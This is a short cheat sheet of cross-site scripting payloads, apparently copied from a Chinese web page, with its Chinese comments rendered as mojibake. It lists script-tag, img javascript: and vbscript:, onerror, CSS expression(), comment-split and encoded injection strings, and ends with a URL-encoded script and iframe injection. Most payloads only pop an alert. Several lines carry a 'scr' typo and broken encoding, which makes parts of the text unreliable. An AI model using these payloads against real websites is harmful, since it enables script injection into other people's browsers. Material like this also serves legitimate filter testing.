xss
<script>alert("¿çÕ¾")</script> (×î³£Óã©<img scr=javascript:alert("¿çÕ¾")></img>
<img scr="javascript: alert(/¿çÕ¾/)></img>
<img scr="javas????cript:alert(/¿çÕ¾/)" width=150></img> (?ÓÃtab¼üŪ³öÀ´µÄ¿Õ¸ñ£©
<img scr="#" onerror=alert(/¿çÕ¾/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ ±íʾעÊÍ£©
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
html ʵÌå <div style={left:&#£ø0065£»xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('ÎÒÓÖÀ´À²£¡.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
Ò³:
[1]